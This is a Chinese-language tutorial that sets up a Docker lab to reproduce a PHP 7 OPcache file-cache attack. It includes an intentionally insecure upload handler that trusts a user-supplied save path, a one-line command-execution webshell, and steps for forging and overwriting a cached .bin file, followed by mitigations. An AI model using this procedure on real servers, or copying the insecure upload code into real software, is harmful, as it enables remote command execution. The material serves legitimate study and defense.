php7的Opcache getshell
OPcache基础
OPcache是一种通过解析的PHP脚本预编译的字节码存放在共享内存中来避免每次加载和解析PHP脚本的开销,解析器可以直接从共享内存读取已经缓存的字节码,从而大大提高了PHP的执行效率。
先看下PHP的正常执行流程
1.request请求(nginx,apache,cli等)
2.Zend引擎读取.php文件
3.扫描其字典和表达式
4.解析文件
5.创建要执行的计算机代码(成为Opcode)
6.最后执行Opcode
7.response返回
每一次执行PHP都要执行一遍上面的步骤,如果PHP源码没有变化,那么Opcode也不会变化,显然没必要 我们看看使用Opcache之后
避免重组编译 减少CPU和内存开销
OPcache配置解读
//开启opcache opcache.enable=1 //CLI环境下,PHP启用OPcache opcache.enable_cli=1 //OPcache共享内存存储大小,单位MB opcache.memory_consumption=128 //PHP使用了一种叫做字符串驻留(string interning)的技术来改善性能。例如,如果你在代码中使用了1000次字符串“foobar”,在PHP内部只会在第一使用这个字符串的时候分配一个不可变的内存区域来存储这个字符串,其他的999次使用都会直接指向这个内存区域。这个选项则会把这个特性提升一个层次——默认情况下这个不可变的内存区域只会存在于单个php-fpm的进程中,如果设置了这个选项,那么它将会在所有的php-fpm进程中共享。在比较大的应用中,这可以非常有效地节约内存,提高应用的性能。 这个选项的值是以兆字节(megabytes)作为单位,如果把它设置为16,则表示16MB,默认是4MB opcache.interned_strings_buffer=8 //这个选项用于控制内存中最多可以缓存多少个PHP文件。这个选项必须得设置得足够大,大于你的项目中的所有PHP文件的总和。 设置值取值范围最小值是 200,最大值在 PHP 5.5.6 之前是 100000,PHP 5.5.6 及之后是 1000000。也就是说在200到1000000之间。 opcache.max_accelerated_files=4000 //设置缓存的过期时间(单位是秒),为0的话每次都要检查 opcache.revalidate_freq=60 //从字面上理解就是“允许更快速关闭”。它的作用是在单个请求结束时提供一种更快速的机制来调用代码中的析构器,
从而加快PHP的响应速度和PHP进程资源的回收速度,这样应用程序可以更快速地响应下一个请求。把它设置为1就可以使用这个机制了。 opcache.fast_shutdown=1 //如果启用(设置为1),OPcache会在opcache.revalidate_freq设置的秒数去检测文件的时间戳(timestamp)检查脚本是否更新。
如果这个选项被禁用(设置为0),opcache.revalidate_freq会被忽略,PHP文件永远不会被检查。这意味着如果你修改了你的代码,然后你把它更新到服务器上,再在浏览器上请求更新的代码对应的功能,你会看不到更新的效果 强烈建议你在生产环境中设置为0,更新代码后,再平滑重启PHP和web服务器。 opcache.validate_timestamps=0 //开启Opcache File Cache(实验性), 通过开启这个, 我们可以让Opcache把opcode缓存缓存到外部文件中, 对于一些脚本, 会有很明显的性能提升. 这样PHP就会在/tmp目录下Cache一些Opcode的二进制导出文件, 可以跨PHP生命周期存在. opcache.file_cache=/tmp
Docker漏洞环境搭建
1.创建容器
创建php7.0的容器 将当前主机的web目录映射到容器中
docker run -d -p 8888:80 --name php80 -v /var/www:/var/www/html --privileged=true --restart=always php:7.0
2.找不到php.ini文件怎么办?
通过这个方法搭建的时候发现php.ini找不到 这一点可以通过phpinfo函数找到 这个
进入linux的/usr/local/etc/php 将目录下的 php.ini-development 文件复制一份到当前文件夹下名为php.ini 重启服务即可完美解决
3.修改配置文件
在php.ini中 找到如下配置;opcache.enable=0
//修改成(去掉;注释,将0改成1) opcache.enable=1 关闭时间戳验证 ;opcache.validate_timestamps=1 //修改成(去掉;注释,将1改成0) opcache.validate_timestamps=0 设置Opcache缓存路径 ;opcache.file_cache= //修改 opcache.file_cache="/tmp/opcache" 设置缓存优先级 ;opcache.file_cache_only=0 //修改 opcache.file_cache_only=1
在最后一行添加 用来引用opcache zend_extension=opcache.so 重启服务器生效
4.添加漏洞页面
在宿主机的web目录创建即可
index.php
<html>
<body>
<form action="upload-file.php" method="post" enctype="multipart/form-data">
<label for="file">filename:</label>
<input type="file" name="file" id="file" />
<br/>
<label for="filepath">filepath:</label>
<input type="text" name="filepath" id="filepath" />
<br/>
<input type="submit" name="submit" value="submit" />
</form>
</body>
</html>
upload-file.php
<?php $path = $_POST['filepath']; echo "filename: " . $_FILES["file"]["name"] . "<br />"; echo "type: " . $_FILES["file"]["type"] . "<br />"; echo "size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />"; move_uploaded_file($_FILES["file"]["tmp_name"], $path . $_FILES["file"]["name"]); echo "save : " . $path . $_FILES["file"]["name"]; ?>
phpinfo.php
<?php
phpinfo();
?>
Opcache漏洞复现
假设目标站点已经又一个phpinfo()文件了,通过这个文件可以得到Opcache缓存目录,还需要下一步计算system_id
system_id是当前PHP版本号,Zend扩展版本号以及各个数据类型大小的MD5哈希值
脚本地址:https://github.com/GoSecure/php7-opcache-override
此时可以利用上传漏洞将文件上传到web目录,但是目录没有读写的权限,这时候就可以通过/tmp/opcache/[system_id]/var/www/index.php.bin为一个webshell的二进制缓存运行webshell
本地构建webshell文件index.php
<?php system($_GET['cmd']); ?>
1.在本地php.ini中设置opcache.file_cache为你所想要指定的缓存目录
2.运行php服务器向index发送请求,触发缓存疫情进行文件缓存
3.打开缓存目录中的index.php.bin文件修改里面的的system_id为目标站点的system_id 记事本打开就ok改成我们用脚本计算出来的system_id值
4.通过上传漏洞将修改后的index.php.bin上传到tmp/opcache/[system_id]/var/www/index.php.bin覆盖掉原来的index.php.bin
重新访问index.php,就成功运行了webshell
漏洞修补:
禁用file_cache_only
启用validate_timestamp
参考引用+其他延伸
CTF题
https://ctf.rip/asis-ctf-2016-binarycloud-web-challenge/
https://github.com/tothi/ctfs/tree/master/alictf-2016/homework
php安装后找不到php.ini
利用PHP的OPcache机制getshell/
https://chybeta.github.io/2017/05/13/利用PHP的OPcache机制
http://www.vuln.cn/6763
